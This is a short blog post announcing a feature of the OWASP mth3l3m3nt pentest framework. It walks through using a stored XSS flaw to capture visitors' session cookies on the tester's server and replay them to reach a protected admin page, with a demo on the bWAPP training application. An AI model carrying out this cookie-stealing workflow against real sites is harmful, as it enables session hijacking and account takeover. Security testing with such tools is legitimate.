It’s been a while since my last “confession”. So today I’m here to tell you that sadly “I placed my hand in the cookie jar”. Pfffffffft!!!!!
There’s a nifty new feature in the OWASP mth3l3m3nt framework that you just might love, it was inspired by pentest tools. It aims to give potency to Cross Site Scripting Attacks. Basically how it works .
Stored XSS Scenario.
- Visit a site identify stored XSS Vulnerability
- Identify a page you would love to test access to e.g. http://victim.com/admin/index.php
- Go back to your mth3l3m3nt framework & in the CTDB tab create campaign
- Feed it the page you would love to test access to because this will determine whether the current cookie can be used to access that page , it will be downloaded for you so that when you view the html you will tell whether it was successfully in the page or not.
- Once you create a campaign , you will get a link to your hooking script a simple example will be provided but feel free to hook your script differently it will still work.
- Wait for the target to visit the page & the information will be sent back to you & stored in your db , pages that you targeted will also be downloaded to your server.
- Open your browser & load the target site , replace the cookie you have with the one you got in your DB then try access the target page after that , if successful, you’re welcome.
Limitations:
- Reflected XSS would need you to bind the script to an existing page & for instance mail the user, feel free to bind it to a blank page also it works so that it executes on load. however this becomes tricky for target pages because of domain restrictions.
- You won’t be able to get cookies that have been marked as httpOnly.
I have a done a demo using bWAPP which is a really good application developed by Malik Mesellem & shown how to increase potency of the attack beyond an alert box by actually stealing a user’s session. Watch it below :
Confession Complete!!